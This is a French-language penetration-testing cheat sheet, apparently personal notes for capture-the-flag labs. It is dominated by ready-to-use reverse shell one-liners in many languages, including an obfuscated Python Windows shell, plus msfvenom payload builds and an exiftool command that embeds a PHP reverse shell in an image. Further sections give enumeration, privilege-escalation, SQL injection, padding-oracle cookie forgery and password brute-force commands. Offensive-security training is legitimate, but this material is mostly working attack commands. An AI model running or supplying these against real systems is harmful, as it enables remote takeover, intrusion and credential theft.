Reverse shell samples :

Bash

  bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
  sh -i >& /dev/udp/192.168.1.2/5555 0>&1

PERL

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Linux:

export RHOST="192.168.1.2";export RPORT=4444;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Windows:

C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('192.168.1.2', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

PHP

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.1.2",4444);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
extention: php, php3, php.jpg, php.png

Ruby

Linux:

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Windows:

ruby -rsocket -e 'c=TCPSocket.new("192.168.1.2","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Netcat

nc -e /bin/sh 10.0.0.1 1234

Si netcat sans option -e :

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
rm -f /tmp/p; mknod /tmp/p p && nc 192.168.1.2 4444 0/tmp/p

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()''

Telnet

telnet ATTACKING-IP 80 | /bin/bash | telnet 192.168.1.2 4444
rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.2 4444 0/tmp/p

Socat

socat tcp-connect:<IP>:<PORT> exec:"bash -li",pty,stderr,setsid,sigint,sane

Powershell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.1.2",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.2',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Awk

awk 'BEGIN {s = "/inet/tcp/0/192.168.1.2/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

NodeJS

require('child_process').exec('nc -e /bin/sh 192.168.1.2 4444')

C

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#include <unistd.h>
 
int main ()
 
{
  const char* ip = "192.168.1.2";
  struct sockaddr_in addr;
  addr.sin_family = AF_INET;
  addr.sin_port = htons(4444);
  inet_aton(ip, &addr.sin_addr);
  int sockfd = socket(AF_INET, SOCK_STREAM, 0);
  connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
  for (int i = 0; i < 3; i++)
  {
    dup2(sockfd, i);
  }
  execve("/bin/sh", NULL, NULL);
  return 0;
}

msfvenom

Linux:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf >reversetcp.elf
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf >reversetcp.elf

Windows:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > reversetcp.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > reversetcp.exe

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Scripts d’énumération automatique :

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh

https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

Commandes d’interaction

who → Affiche les tty connectés

wall “hello world !” → Envoie un message sur tous les tty connectés

Transfert de fichiers

socat TCP4-LISTEN:1234 TCP4:10.10.10.171:80 &→ Lance un relai TCP vers une autre machine (pivoting)

python -m SimpleHTTPServer <PORT>→ Lance un serveur web dans le répertoire local

apt-get install python-pyftpdlib python -m pyftpdlib -p 21 →Lance un serveur ftp dans le répertoire courant

login = anonymous

pwd = anonymous@

impacket/examples/smbserver.py -smb2support -username guest -password guest share /root/htb→ Lance un serveur smb accessible en tant que guest/guest

Possibilité d’y accéder sous Windows avec un net use

De machine cible vers machine local

nc –l -p [LocalPort] > [outfile]
nc –w3 [TargetIPaddr] [port] < [infile]

De machine local a machine cible

nc –l -p [LocalPort] < [infile]
nc –w3 [TargetIPaddr] [port] > [outfile]

Enumération :

nslookup -type=<MX / A / AAA / TXT / CNAME / PTR> <DOMAIN> [IP_NAMESERVER]

nslookup -type=MX test.fr

nmap --script <SCRIPT> -p <PORT> <IPADDRESS>

nmap -p- $ip → liste les ports ouverts (-p- = -p 1-65535 = tout les ports)

nmap -p 22,80 -sC -sV -oN outfile.txt $ip

nmap -A -T4 -sV $ip

nmap –script smb-vuln* -p 139,445 $ip

Options:

-A : détection du système et des versions

-sP : simple ping scan

-sS/sT/sA/sW/sM: Scans TCP SYN/Connect()/ACK/Window/Maimon

-sN/sF/sX: Scans TCP Null, FIN et Xmas

-sU: Scan UDP

-sC: Equivalent à –script=default

-sV: Essai de déterminer le service et la version

-oN/-oX: outfile.txt/outfile.xml

-T4 : Définit une temporisation[0-5]

nikto -h <URL> -p <PORTS>
nikto -h <URL>:<PORTS>

nikto -h $ip -p 80,443

gobuster dir --url <IP ADDRESS> --wordlist <WORDLIST> -x <EXTENSION>

gobuster dir –url $ip –wordlist /usr/share/wordlists/dirb/big.txt -x php,txt,html,htm

-k → pas de vérification du certificat SSL

cat *.txt | gobuster dir –url $ip –wordlist - → pour piper plusieurs wordlists dans gobuster

Wordlists:
  1. /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
  2. /usr/share/dirb/wordlists/big.txt
smbclient --list //<IPADDRESS>/ -U "" -> Enumération des répertoires partagés accessibles en anonymous

rpcclient -U “” -N $ip → Accès en RPC de façon anonyme (WINDOWS)

enum4linux -a $ip → Enumération SMB, RPC & co (WINDOWS)

dirb <url> <wordlist>

dirb http://docker.hackthebox.eu:58651 /usr/share/dirb/wordlists/vulns/apache.txt

dirb options :

-a “agent” → spécifie un user-agent

-R → récursivité interactive

-o output.txt → redirige l'output

wfuzz –hh=<PARAM_SIZE> -w <WORDLIST> <URL>.php?<PARAM_NAME>=test

wfuzz –hh=24 -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?FUZZ=test

Exploitation & Elévation de privilèges :

python -c 'import pty; pty.spawn(“/bin/sh”)'

/usr/bin/script -qc /bin/bash /dev/null

Pour obtenir un shell plus élevé, afin de passer d’un reverse shell à un shell complet

padbuster <URL> <COOKIE> <BLOCK_SIZE> -cookies "<PHPESSID_COOKIE> <OPTIONNAL_COOKIES>" --plaintext '<NEW_VALUE>'

padbuster http://docker.hackthebox.eu:59436/profile.php tu%2FOelHH0Nx8BaMhIurtihnbzj6YiABdvdMp0%2Fm6NII%2FClg%2B5Os9Rg%3D%3D 8 -cookies “PHPSESSID=74j9m7o8pbaq8pdoq3l56rvpk4; iknowmag1k=tu%2FOelHH0Nx8BaMhIurtihnbzj6YiABdvdMp0%2Fm6NII%2FClg%2B5Os9Rg%3D%3D” –plaintext ‘{“user”:”test”,”role”:”admin”}’

searchsploit -t <INTITLE>  <KEYWORDS> -w

searchsploit windows local smb

sudo -l → liste les commandes autorisées pour l’utilisateur courant

find / -type d -writable 2> /dev/null→ Liste les répertoires accessibles en écriture

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 6 -exec ls -ld {} \; 2>/dev/null→ Liste les binaires exécutables par l’utilisateur courant

find / -type f -perm /6000 -ls 2>/dev/null→ Liste les fichiers setuid/setgid sur le système

find / -iname “mon_fichier” -print 2>/dev/null→ Trouver un fichier précis sur le système

binwalk socute.jpg→ Vérifier le contenu d’une image (peut contenir des fichiers zip par exemple)

msfvenom -p windows/meterpreter/reverse_tcp lhost=<LOCALIP> lport=<LOCALPORT> -f <FORMAT> > <OUTPUTFILE>

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.100 lport=4444 -f exe > payload.exe

exiftool -Comment='<?php $sock = fsockopen("<IPADDRESS>",<PORT>);$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>'   <IMAGE>

exiftool -Comment='<?php $sock = fsockopen(“10.10.10.1”,1234);$proc = proc_open(“/bin/sh -i”, array(0⇒$sock, 1⇒$sock, 2⇒$sock), $pipes); ?>’ photo.png

Injection SQL :

sqlmap -u <URL> (--dbs / --tables -D <DATABASE> / --columns -D <DATABASE> -T <TABLENAME>)

sqlmap -u http://bidule.fr/index.php?id= –columns -D information_schema -T USER_PRIVILEGES

Les caractères accentué pour problème lors de l'authentification ( creds )

Bruteforce :

Creation Dico

Crée un dico depuis une url

crunch <min length> <max length> <characters to use> -o output.txt

crunch 4 4 1234ABCDEF -o wordlist.txt

crunch 4 15 “abcdefghijklmnopqrstuvwxyz”

-t : set a specific pattern of @,%^ @ represents lowercase letters , represents uppercase letters % represents numbers
cewl <URL>

cewl -d 2 -m 5 -w dict.txt https://example.com Scanner à une profondeur de 2 (-d 2) et utiliser une longueur de mot minimale de 5 (-m 5), enregistrer les mots dans un fichier (-w dict.txt), en ciblant l'URL donnée (https://example.com)

cupp Générer des dictionnaires pour les attaques à partir de données personnelles

ncrack -U <USERS.TXT> -P <PASSWD.TXT> ssh://$ip
hydra -l <USER> -P <WORDLIST> <IP ADDRESS> <METHOD> <URL>

hydra -l admin -P /usr/share/wordlists/rockyou.txt $ip http-get /monitoring

hydra -l <LOGIN> -P <WORDLIST> <URL> <METHOD>"<PAGE>:<ARGUMENT>=^<VALUE>^:<INCORRECT STRING>" -w <THREADS> -s <PORT>

hydra -l admin -P /usr/share/wordlists/rockyou.txt docker.hackthebox.eu http-post-form “/index.php:password=^PASS^:Invalid password” -w 10 -s 45692

john –incremental <HASHFILE> → Pour bruteforcer de façon incrémentale

john <HASHFILE> –wordlist=/usr/share/wordlists/rockyou.txt→ Pour bruteforcer avec un dictionnaire

Script de bruteforce anti-CSRF :

https://github.com/J3wker/anti-CSRF_Token-Bruteforce

MISC

ROT47

perl -lanE '$_ =~ tr/!-~/P-~!-O/; say $_' dic.txt > dic_rot47.txt

600|

SOURCES: